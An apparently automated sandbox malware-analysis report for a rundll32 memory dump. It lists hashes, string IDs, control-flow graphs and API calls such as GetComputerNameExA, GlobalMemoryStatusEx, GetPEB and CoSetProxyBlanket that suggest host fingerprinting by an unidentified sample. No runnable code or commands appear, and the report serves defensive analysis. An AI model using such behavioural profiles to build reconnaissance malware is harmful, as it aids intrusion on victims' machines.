                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Navigation to non-$TMP$TMP
                                                                  • API String ID: 0-443054689
                                                                  • Opcode ID: 2f6d362f2dd69a6c9bf180011339f1444de1c953749e7d0391d344e62d17fd7a
                                                                  • Instruction ID: 4f218055e4b8db0b91d846b2c3083b93fcb5cb9cefe95f05a40905d0dedbfe74
                                                                  • Opcode Fuzzy Hash: 2f6d362f2dd69a6c9bf180011339f1444de1c953749e7d0391d344e62d17fd7a
                                                                  • Instruction Fuzzy Hash: 397247B8E04228CBDB25CF66D884BEDB7B2FF48310F6481DAD449A7244D734AA85CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Navigation to non-$TMP$TMP
                                                                  • API String ID: 0-443054689
                                                                  • Opcode ID: 7a9103e931ebd24b05cfeac2b69f82fcebfa5d5f3895e0a1c2357fa61b407782
                                                                  • Instruction ID: df923c6e1507be193310c0de85c4e81e3902ad3ef4f18fb98cb612c314f84d21
                                                                  • Opcode Fuzzy Hash: 7a9103e931ebd24b05cfeac2b69f82fcebfa5d5f3895e0a1c2357fa61b407782
                                                                  • Instruction Fuzzy Hash: E77237B8E04228CBDB25CF66D894BEDB7B2FF48314F6481DAD449A7244D734AA85CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Navigation to non-$TMP$TMP
                                                                  • API String ID: 0-443054689
                                                                  • Opcode ID: 78e2e506d57d37af4d0558d637c0c5aadc7596a1c7a8abc38583cfaaf75a580c
                                                                  • Instruction ID: aa35068d42984830ef7b3f2f6083ca7fd1e80b05afb57014b944830546124d15
                                                                  • Opcode Fuzzy Hash: 78e2e506d57d37af4d0558d637c0c5aadc7596a1c7a8abc38583cfaaf75a580c
                                                                  • Instruction Fuzzy Hash: 037237B9E04228CBDB25CF66D890BEDB7B2FF48314F6481DAD449A7244D734AA85CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Navigation to non-$TMP$TMP
                                                                  • API String ID: 0-443054689
                                                                  • Opcode ID: 029e7d32aecd79c950541993764f5bf0be0a35f1ae9597de886b00c01cfbeb48
                                                                  • Instruction ID: 9c8cacbb55134c9ad373cfc24da47a7ae7eac2dba34410f54180dec07f9c9ce7
                                                                  • Opcode Fuzzy Hash: 029e7d32aecd79c950541993764f5bf0be0a35f1ae9597de886b00c01cfbeb48
                                                                  • Instruction Fuzzy Hash: 9D723879E04228CBDB65CF66D890BADB7F2FF48310F64819AD449A7244D734AA81CF60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TMP$TMP
                                                                  • API String ID: 0-2876906010
                                                                  • Opcode ID: 9c2913dcade4e426c1fc8e71e9a211ab3775ea16f189b60bc450d2dec5d29ef9
                                                                  • Instruction ID: a20eeb712ded20a006826e72ef4f17862103fe289d4ca37a480f711d2c9eab27
                                                                  • Opcode Fuzzy Hash: 9c2913dcade4e426c1fc8e71e9a211ab3775ea16f189b60bc450d2dec5d29ef9
                                                                  • Instruction Fuzzy Hash: AF422478E04268CBDB25CF66D890BEDB7B2FF48314F6481DAD409A7245E734AA81CF51
                                                                  APIs
                                                                  • GetTempFileNameW.KERNEL32(7FB68204,TMP,00000000,?,?,?,05BFEAE5,00059755,FFFFFE9B,FFFFFFFF,?,?), ref: 7FB3D8FE
                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 7FB3DA1A
                                                                  • lstrlenW.KERNEL32(?), ref: 7FB3E5FE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryFileNameTemplstrlen
                                                                  • String ID: TMP$TMP
                                                                  • API String ID: 1953906443-2876906010
                                                                  • Opcode ID: 2db214365c9505891379c98bca02adf588c37c7f1122c5ce8b10c3cd430d7129
                                                                  • Instruction ID: 1dace79c8d11c3d33bb08d3d08a4a63fcafc27016e13ce79a6dcd945b6508d4e
                                                                  • Opcode Fuzzy Hash: 2db214365c9505891379c98bca02adf588c37c7f1122c5ce8b10c3cd430d7129
                                                                  • Instruction Fuzzy Hash: 5F2202B8E04268CBDB65CF69D890BADB7B1FF48314F6481DAD409A7245E734AA81CF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4093 7fb2f830-7fb2f859 call 7fafdf00 4096 7fb2f864-7fb2f868 4093->4096 4097 7fb2f86a-7fb2f8ac 4096->4097 4098 7fb2f8ae-7fb2f8fc call 7faf1d50 4096->4098 4097->4096 4103 7fb2f908-7fb2f9b6 4098->4103 4104 7fb2f8fe-7fb2f903 4098->4104 4106 7fb2f9c1-7fb2f9c5 4103->4106 4105 7fb302d4-7fb302d9 4104->4105 4107 7fb2f9c7-7fb2fa0a 4106->4107 4108 7fb2fa0c-7fb2fb1e call 7faf1f90 CoInitializeSecurity 4106->4108 4107->4106 4112 7fb2fb29-7fb2fb2d 4108->4112 4113 7fb2fb74-7fb2fbd1 call 7faf1f60 4112->4113 4114 7fb2fb2f-7fb2fb72 4112->4114 4119 7fb2fd32-7fb2fddd 4113->4119 4120 7fb2fbd7-7fb2fc94 4113->4120 4114->4112 4122 7fb2fde8-7fb2fdec 4119->4122 4121 7fb2fc9f-7fb2fca3 4120->4121 4125 7fb2fca5-7fb2fce8 4121->4125 4126 7fb2fcea-7fb2fd2d call 7faf1f30 4121->4126 4123 7fb2fe33-7fb2fe95 4122->4123 4124 7fb2fdee-7fb2fe31 4122->4124 4132 7fb2fe9b-7fb2ff3e 4123->4132 4133 7fb2ffdc-7fb30099 4123->4133 4124->4122 4125->4121 4126->4105 4141 7fb2ff49-7fb2ff4d 4132->4141 4134 7fb300a4-7fb300a8 4133->4134 4136 7fb300aa-7fb300ed 4134->4136 4137 7fb300ef-7fb3014e call 7faf1cc0 CoSetProxyBlanket 4134->4137 4136->4134 4145 7fb302d2 4137->4145 4146 7fb30154-7fb30237 4137->4146 4143 7fb2ff94-7fb2ffd7 call 7faf1f30 4141->4143 4144 7fb2ff4f-7fb2ff92 4141->4144 4143->4105 4144->4141 4145->4105 4153 7fb30242-7fb30246 4146->4153 4154 7fb30248-7fb3028b 4153->4154 4155 7fb3028d-7fb302d0 call 7faf1f30 4153->4155 4154->4153 4155->4105
                                                                  APIs
                                                                  • CoInitializeSecurity.COMBASE(00000000,00000000), ref: 7FB2FA5A
                                                                  • CoSetProxyBlanket.COMBASE(00000000,00000000,00000003,00000003,00000000,00000000), ref: 7FB30140
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: BlanketInitializeProxySecurity
                                                                  • String ID: w$}
                                                                  • API String ID: 257369873-1906527200
                                                                  • Opcode ID: 2f1fa6b57abc4f0072289bf5cfbcc6211d23536f97053bf9edf17084e00ec5fc
                                                                  • Instruction ID: 9db6727e46705d66697f58b5b6d715a47a484d827cf194bf5bd557c53d99ab29
                                                                  • Opcode Fuzzy Hash: 2f1fa6b57abc4f0072289bf5cfbcc6211d23536f97053bf9edf17084e00ec5fc
                                                                  • Instruction Fuzzy Hash: 92622334E04259CBDB24CFA4D850BDEB7B2EF98300F1081AAD50DAB3A4E7756A85CF55

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4186 7fb2e1c0-7fb2e204 GetPEB 4187 7fb2e207-7fb2e250 4186->4187 4188 7fb2e252-7fb2e259 4187->4188 4189 7fb2e25b 4187->4189 4190 7fb2e262-7fb2e26e 4188->4190 4189->4190 4191 7fb2e330-7fb2e34e 4190->4191 4192 7fb2e274-7fb2e27a 4190->4192 4191->4187 4194 7fb2e354 4191->4194 4193 7fb2e27d-7fb2e290 4192->4193 4193->4191 4195 7fb2e296-7fb2e2b1 4193->4195 4196 7fb2e35b-7fb2e398 GlobalMemoryStatusEx call 7fb40bb0 * 2 4194->4196 4197 7fb2e2b8-7fb2e2cf 4195->4197 4199 7fb2e2d1-7fb2e2f3 4197->4199 4200 7fb2e2d9-7fb2e2ea 4197->4200 4205 7fb2e2f5-7fb2e329 4199->4205 4206 7fb2e32b 4199->4206 4200->4197 4205->4196 4206->4193
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aulldiv$GlobalMemoryStatus
                                                                  • String ID: @
                                                                  • API String ID: 2185283323-2766056989
                                                                  • Opcode ID: 8734f1211b85a6318f929fc4cf8eb8f3e69b817ff5f0d72e8ab336c98d0aaec9
                                                                  • Instruction ID: 43f5109b516837c4dc01c6775b2e8ed821a559f0824c47c7aaa2f6cf4e5d41c0
                                                                  • Opcode Fuzzy Hash: 8734f1211b85a6318f929fc4cf8eb8f3e69b817ff5f0d72e8ab336c98d0aaec9
                                                                  • Instruction Fuzzy Hash: CD719DB8E042599FCB08CF99D590AEEBBB1BF48304F208199D919AB345D734AA41CF95

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4207 7fb29d20-7fb29d40 call 7fb2f830 4210 7fb29d42-7fb29d4f 4207->4210 4211 7fb29daf-7fb29dd9 call 7fafe070 4207->4211 4212 7fb29d55-7fb29d65 4210->4212 4216 7fb29de4-7fb29de8 4211->4216 4212->4212 4214 7fb29d67-7fb29da5 call 7fb13290 4212->4214 4223 7fb2a55a-7fb2a55f 4214->4223 4218 7fb29dea-7fb29e2c 4216->4218 4219 7fb29e2e-7fb29e9e 4216->4219 4218->4216 4222 7fb29ea9-7fb29ead 4219->4222 4224 7fb29eeb-7fb29f45 4222->4224 4225 7fb29eaf-7fb29ee9 4222->4225 4228 7fb2a12b-7fb2a13d 4224->4228 4229 7fb29f4b-7fb2a02f 4224->4229 4225->4222 4230 7fb2a143-7fb2a167 4228->4230 4231 7fb2a3d4-7fb2a3f1 4228->4231 4241 7fb2a03a-7fb2a03e 4229->4241 4236 7fb2a1d1-7fb2a23a call 7faf1d20 4230->4236 4237 7fb2a169-7fb2a176 4230->4237 4240 7fb2a3f6-7fb2a4c6 4231->4240 4256 7fb2a245-7fb2a249 4236->4256 4238 7fb2a17c-7fb2a18c 4237->4238 4238->4238 4242 7fb2a18e-7fb2a1cc call 7fb13290 4238->4242 4253 7fb2a4d1-7fb2a4d5 4240->4253 4243 7fb2a040-7fb2a083 4241->4243 4244 7fb2a085-7fb2a0d0 call 7faf1f30 4241->4244 4242->4231 4243->4241 4263 7fb2a0d6-7fb2a0e6 4244->4263 4254 7fb2a4d7-7fb2a51a 4253->4254 4255 7fb2a51c-7fb2a555 call 7faf1f30 4253->4255 4254->4253 4255->4223 4260 7fb2a290-7fb2a2d8 4256->4260 4261 7fb2a24b-7fb2a28e 4256->4261 4266 7fb2a2dd-7fb2a349 call 7faf1ea0 call 7fb12420 call 7faf1db0 call 7fb3e9e0 4260->4266 4261->4256 4263->4263 4265 7fb2a0e8-7fb2a126 call 7fb13290 4263->4265 4265->4223 4279 7fb2a34f-7fb2a35f 4266->4279 4279->4279 4280 7fb2a361-7fb2a3cd call 7fb13290 call 7fb12a20 call 7faf1fc0 4279->4280 4280->4231
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5$G$N/A$r$t
                                                                  • API String ID: 0-3929796496
                                                                  • Opcode ID: 49efd2db41743b0db88908f6b9df063b62d25b3ab67c45191b5711bc2dc9b04f
                                                                  • Instruction ID: a8789ba4bd2faabfa24b22db3e8721751fc69822f64e444a11ab21a9bebe5672
                                                                  • Opcode Fuzzy Hash: 49efd2db41743b0db88908f6b9df063b62d25b3ab67c45191b5711bc2dc9b04f
                                                                  • Instruction Fuzzy Hash: E442F374E042189BDB18CFA8D890BDEB7B2FF88304F1081A9D50DAB354EB756A85CF55

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4289 7fb295f0-7fb29815 4290 7fb29817-7fb2984a 4289->4290 4291 7fb2984c-7fb29853 4289->4291 4292 7fb2986f-7fb2988b GetProcessHeap 4290->4292 4291->4292 4293 7fb29855-7fb2986b 4291->4293 4294 7fb298a0 4292->4294 4295 7fb2988d-7fb29895 4292->4295 4293->4292 4297 7fb298a7-7fb298ae 4294->4297 4295->4294 4296 7fb29897-7fb2989e 4295->4296 4296->4297 4298 7fb298b0-7fb298bc 4297->4298 4299 7fb298be-7fb298c1 4297->4299 4300 7fb298c6-7fb298d8 4298->4300 4299->4300 4301 7fb298da 4300->4301 4302 7fb298ed 4300->4302 4304 7fb298e4-7fb298eb 4301->4304 4305 7fb298dc-7fb298e2 4301->4305 4303 7fb298f4-7fb298fc 4302->4303 4306 7fb298fe-7fb29909 GetDriveTypeA 4303->4306 4307 7fb2990c-7fb29952 4303->4307 4304->4303 4305->4302 4305->4304 4306->4307
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 7FB2986F
                                                                  • GetDriveTypeA.KERNEL32(7FB681EC), ref: 7FB29903
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DriveHeapProcessType
                                                                  • String ID: *
                                                                  • API String ID: 2912393814-163128923
                                                                  • Opcode ID: 1dfc5414e7c168b47e5e4193053b95dd34341665317e9f267950b06275667589
                                                                  • Instruction ID: ef1060600115370b2172acfb0204d8d043ebbbb7b29ded748af824dafd3acaf6
                                                                  • Opcode Fuzzy Hash: 1dfc5414e7c168b47e5e4193053b95dd34341665317e9f267950b06275667589
                                                                  • Instruction Fuzzy Hash: 03A12879D04258CFCB25CFAAC44079DBBF2BB49320F3881AAD459A7740E7309A56CF61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4342 7fb2e690-7fb2e6ed GetPEB 4343 7fb2e6f0-7fb2e745 4342->4343 4344 7fb2e750 4343->4344 4345 7fb2e747-7fb2e74e 4343->4345 4346 7fb2e757-7fb2e763 4344->4346 4345->4346 4347 7fb2e825-7fb2e843 4346->4347 4348 7fb2e769-7fb2e76f 4346->4348 4347->4343 4349 7fb2e849 4347->4349 4350 7fb2e772-7fb2e785 4348->4350 4351 7fb2e850-7fb2e868 GetComputerNameExA 4349->4351 4350->4347 4352 7fb2e78b-7fb2e7a6 4350->4352 4353 7fb2e8d5-7fb2e8ed call 7faf1f00 4351->4353 4354 7fb2e86a-7fb2e877 4351->4354 4355 7fb2e7ad-7fb2e7c4 4352->4355 4369 7fb2e957-7fb2e966 4353->4369 4370 7fb2e8ef-7fb2e8fc 4353->4370 4356 7fb2e87d-7fb2e88d 4354->4356 4358 7fb2e7c6-7fb2e7e8 4355->4358 4359 7fb2e7ce-7fb2e7df 4355->4359 4356->4356 4360 7fb2e88f-7fb2e8d0 call 7fb13290 4356->4360 4363 7fb2e820 4358->4363 4364 7fb2e7ea-7fb2e81e 4358->4364 4359->4355 4368 7fb2e9c1-7fb2e9c4 4360->4368 4363->4350 4364->4351 4372 7fb2e96c-7fb2e97c 4369->4372 4371 7fb2e902-7fb2e912 4370->4371 4371->4371 4373 7fb2e914-7fb2e955 call 7fb13290 4371->4373 4372->4372 4374 7fb2e97e-7fb2e9bc call 7fb13290 4372->4374 4373->4368 4374->4368
                                                                  APIs
                                                                  • GetComputerNameExA.KERNEL32(?,?,?), ref: 7FB2E863
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ComputerName
                                                                  • String ID: WORKGROUP
                                                                  • API String ID: 3545744682-2380569353
                                                                  • Opcode ID: 88b8d2826a7e1139675acd5ad50f34da69ca235dfd4d46a62268ffaded3a3a61
                                                                  • Instruction ID: 8caac2e80d833b826179de2c82d63215f6ef3a67672a7da0ed8982e73a1221c2
                                                                  • Opcode Fuzzy Hash: 88b8d2826a7e1139675acd5ad50f34da69ca235dfd4d46a62268ffaded3a3a61
                                                                  • Instruction Fuzzy Hash: 90B1CFB4E04258DFDB14CFA9D890BDDBBB2BF48304F248199D859AB345D730AA85CF51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4378 7fb30c00-7fb30cda call 7fae2ff0 call 7fb121e0 call 7fb015e0 call 7fb166d0 call 7fb00070 call 7fb16350 call 7fb02b40 call 7fb16690 4395 7fb30d43-7fb30d49 4378->4395 4396 7fb30cdc-7fb30ceb 4378->4396 4398 7fb30db2-7fb30e42 call 7fae3160 call 7faf63a0 call 7fae2ff0 4395->4398 4399 7fb30d4b-7fb30d5a 4395->4399 4397 7fb30cf1-7fb30d01 4396->4397 4397->4397 4400 7fb30d03-7fb30d3e call 7fb13290 4397->4400 4411 7fb30e48-7fb30e58 4398->4411 4401 7fb30d60-7fb30d70 4399->4401 4400->4395 4401->4401 4405 7fb30d72-7fb30dad call 7fb13290 4401->4405 4405->4398 4411->4411 4412 7fb30e5a-7fb31a11 call 7fae5360 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7faf5f50 call 7fae3160 call 7faf63a0 call 7fae45d0 call 7faed1f0 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7faf5f50 call 7fae3160 call 7faf63a0 call 7fae45d0 call 7faed1f0 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7faf5f50 call 7fae3160 call 7faf63a0 call 7fae45d0 call 7faed1f0 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7faf5f50 call 7fae3160 call 7faf63a0 call 7fae45d0 call 7faed1f0 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7faf5f50 call 7fae3160 call 7faf63a0 call 7faf6480 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7faf5f50 call 7fae3160 call 7faf63a0 call 7faf6480 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7faf5f50 * 2 call 7fb406c6 * 2 call 7fb120f0 call 7fb406c6 call 7fb120f0 call 7fb406c6 call 7fb120f0 call 7fb406c6 call 7fb120f0 call 7fb406c6 call 7fb120f0 call 7fb406c6 call 7fb120f0 call 7fb406c6 call 7fb120f0 call 7fb239c0 call 7fb11690 call 7fb25ec0 call 7fae2ff0 4411->4412 4569 7fb31a17-7fb31a27 4412->4569 4569->4569 4570 7fb31a29-7fb31b3b call 7fae5360 call 7fb120f0 call 7fae48d0 call 7faf9e20 call 7fb120f0 call 7faf63a0 * 3 call 7fb34390 4569->4570 4589 7fb31b90-7fb31c0f call 7faf63a0 * 2 call 7fae2ff0 4570->4589 4590 7fb31b3d-7fb31b8a call 7fb01e10 call 7fb16090 call 7fb11690 call 7faf1cf0 4570->4590 4603 7fb31c15-7fb31c25 4589->4603 4590->4589 4610 7fb324d1-7fb325b7 call 7faf63a0 * 2 call 7fb172d0 call 7fb120f0 * 2 call 7fb13200 call 7fb17680 call 7fb120f0 * 3 call 7fb13200 call 7fb17680 call 7fb120f0 * 2 4590->4610 4603->4603 4605 7fb31c27-7fb31c9b call 7fae5360 call 7fb34390 4603->4605 4615 7fb31cf0-7fb31d6e call 7faf63a0 * 2 call 7fae2ff0 4605->4615 4616 7fb31c9d-7fb31cea call 7fafca40 call 7fb162d0 call 7fb11690 call 7faf1cf0 4605->4616 4712 7fb325ba-7fb325c7 4610->4712 4635 7fb31d74-7fb31d84 4615->4635 4616->4615 4647 7fb323d4-7fb324cc call 7faf63a0 * 2 call 7fb172d0 call 7fb120f0 * 3 call 7fb13200 call 7fb17680 call 7fb120f0 * 3 call 7fb13200 call 7fb17680 call 7fb120f0 * 2 4616->4647 4635->4635 4638 7fb31d86-7fb31dfa call 7fae5360 call 7fb34390 4635->4638 4653 7fb31e4f-7fb31ece call 7faf63a0 * 2 call 7fae2ff0 4638->4653 4654 7fb31dfc-7fb31e49 call 7fb016b0 call 7fb16250 call 7fb11690 call 7faf1cf0 4638->4654 4647->4712 4682 7fb31ed4-7fb31ee4 4653->4682 4654->4653 4695 7fb322c8-7fb323cf call 7faf63a0 * 2 call 7fb172d0 call 7fb120f0 * 4 call 7fb13200 call 7fb17680 call 7fb120f0 * 3 call 7fb13200 call 7fb17680 call 7fb120f0 * 2 4654->4695 4682->4682 4686 7fb31ee6-7fb31f5a call 7fae5360 call 7fb34390 4682->4686 4706 7fb31faf-7fb31ff6 GetPEB 4686->4706 4707 7fb31f5c-7fb31fa9 call 7fb008e0 call 7fb16290 call 7fb11690 call 7faf1cf0 4686->4707 4695->4712 4711 7fb31ff9-7fb32054 4706->4711 4707->4706 4746 7fb321ad-7fb322c3 call 7faf63a0 * 2 call 7fb172d0 call 7fb120f0 * 5 call 7fb13200 call 7fb17680 call 7fb120f0 * 3 call 7fb13200 call 7fb17680 call 7fb120f0 * 2 4707->4746 4716 7fb32062 4711->4716 4717 7fb32056-7fb32060 4711->4717 4721 7fb3206c-7fb3207b 4716->4721 4717->4721 4725 7fb32081-7fb32087 4721->4725 4726 7fb32164-7fb3218e 4721->4726 4727 7fb3208a-7fb320a3 4725->4727 4726->4711 4731 7fb32194 4726->4731 4727->4726 4732 7fb320a9-7fb320ca 4727->4732 4736 7fb3219e-7fb321a6 4731->4736 4737 7fb320d1-7fb320e8 4732->4737 4736->4746 4741 7fb320f5-7fb32106 4737->4741 4742 7fb320ea-7fb32112 4737->4742 4741->4737 4751 7fb32114-7fb3215d 4742->4751 4752 7fb3215f 4742->4752 4746->4712 4751->4736 4752->4727
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::exception::exception
                                                                  • String ID: L
                                                                  • API String ID: 2807920213-2909332022
                                                                  • Opcode ID: 218a7f2d36c77ca929444129d53618bfb7fc5ded48b51926c57575442dcbb50c
                                                                  • Instruction ID: e3c6288308f69b76f67028798071a55709e511ade0ba0a18bbb8873ce938ff37
                                                                  • Opcode Fuzzy Hash: 218a7f2d36c77ca929444129d53618bfb7fc5ded48b51926c57575442dcbb50c
                                                                  • Instruction Fuzzy Hash: 680310B0D05268CBDB25DB68CD94BDEBBB5AF48304F1081D9E509A7281DB746F88CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4814 6c33d860-6c33d8a3 call 6c33d2a0 call 6c332460 call 6c33d120 4822 6c33d8a5-6c33d8a9 4814->4822 4823 6c33d8ab-6c33d8ad 4814->4823 4822->4823 4824 6c33d8b2-6c33d8ff 4822->4824 4825 6c33e554-6c33e557 4823->4825 4826 6c33d906-6c33dc06 call 6c33d350 call 6c332460 call 6c33d1e0 CoInitializeSecurity call 6c33d840 call 6c33d850 * 2 call 6c33d830 * 8 call 6c33d840 call 6c33d850 * 2 call 6c33d830 * 8 call 6c33d400 call 6c332460 call 6c33d1b0 4824->4826 4884 6c33dc08-6c33dc0c 4826->4884 4885 6c33dc0e 4826->4885 4884->4885 4886 6c33dc13-6c33dcbc call 6c33d0f0 call 6c33d240 4884->4886 4887 6c33e41f-6c33e423 4885->4887 4919 6c33dcc4 4886->4919 4920 6c33dcbe-6c33dcc2 4886->4920 4889 6c33e437-6c33e43b 4887->4889 4890 6c33e425-6c33e432 call 6c33d210 4887->4890 4893 6c33e44b-6c33e44f 4889->4893 4894 6c33e43d-6c33e446 4889->4894 4890->4889 4896 6c33e451-6c33e45a 4893->4896 4897 6c33e45f-6c33e463 4893->4897 4894->4893 4896->4897 4898 6c33e473-6c33e477 4897->4898 4899 6c33e465-6c33e46e 4897->4899 4901 6c33e487-6c33e48b 4898->4901 4902 6c33e479-6c33e482 4898->4902 4899->4898 4903 6c33e49b-6c33e49f 4901->4903 4904 6c33e48d-6c33e496 4901->4904 4902->4901 4907 6c33e4a1-6c33e4aa 4903->4907 4908 6c33e4af-6c33e4b3 4903->4908 4904->4903 4907->4908 4910 6c33e4c3-6c33e4c7 4908->4910 4911 6c33e4b5-6c33e4be 4908->4911 4912 6c33e4d7-6c33e4db 4910->4912 4913 6c33e4c9-6c33e4d2 4910->4913 4911->4910 4914 6c33e4eb-6c33e4ef 4912->4914 4915 6c33e4dd-6c33e4e6 4912->4915 4913->4912 4917 6c33e4f1-6c33e4fa 4914->4917 4918 6c33e4ff-6c33e503 4914->4918 4915->4914 4917->4918 4921 6c33e513-6c33e53f call 6c33d6e0 call 6c332460 call 6c33d180 4918->4921 4922 6c33e505-6c33e50e 4918->4922 4919->4887 4920->4919 4923 6c33dcc9-6c33dce4 4920->4923 4939 6c33e541-6c33e548 4921->4939 4940 6c33e54a 4921->4940 4922->4921 4927 6c33dce6-6c33dcea 4923->4927 4928 6c33dcec 4923->4928 4927->4928 4930 6c33dcf1-6c33dd0a 4927->4930 4928->4887 4935 6c33dd12 4930->4935 4936 6c33dd0c-6c33dd10 4930->4936 4935->4887 4936->4935 4938 6c33dd17-6c33dd32 4936->4938 4943 6c33dd34-6c33dd38 4938->4943 4944 6c33dd3a 4938->4944 4941 6c33e551 4939->4941 4940->4941 4941->4825 4943->4944 4945 6c33dd3f-6c33dd56 4943->4945 4944->4887 4947 6c33dd58-6c33dd5c 4945->4947 4948 6c33dd5e 4945->4948 4947->4948 4949 6c33dd63-6c33dd7c 4947->4949 4948->4887 4951 6c33dd84 4949->4951 4952 6c33dd7e-6c33dd82 4949->4952 4951->4887 4952->4951 4953 6c33dd89-6c33ddf9 call 6c33d0c0 4952->4953 4957 6c33deea-6c33df70 call 6c33d4b0 call 6c33e5e0 call 6c33d150 4953->4957 4958 6c33ddff-6c33de1c 4953->4958 4984 6c33df76-6c33e02c call 6c33d620 call 6c33e560 call 6c33d680 call 6c33e560 4957->4984 4985 6c33e04f-6c33e0fa call 6c33d270 call 6c33d150 4957->4985 4958->4957 4959 6c33de22-6c33de3a 4958->4959 4961 6c33de71-6c33de78 4959->4961 4962 6c33de3c-6c33de46 4959->4962 4965 6c33de7a-6c33de83 4961->4965 4966 6c33deae-6c33deb5 4961->4966 4967 6c33de48-6c33de4c 4962->4967 4968 6c33de4d-6c33de4f 4962->4968 4971 6c33de85-6c33de89 4965->4971 4972 6c33de8a-6c33de8c 4965->4972 4973 6c33deb7-6c33dec8 4966->4973 4974 6c33decc-6c33ded3 4966->4974 4967->4968 4968->4961 4970 6c33de51-6c33de58 4968->4970 4970->4961 4976 6c33de5a-6c33de6f 4970->4976 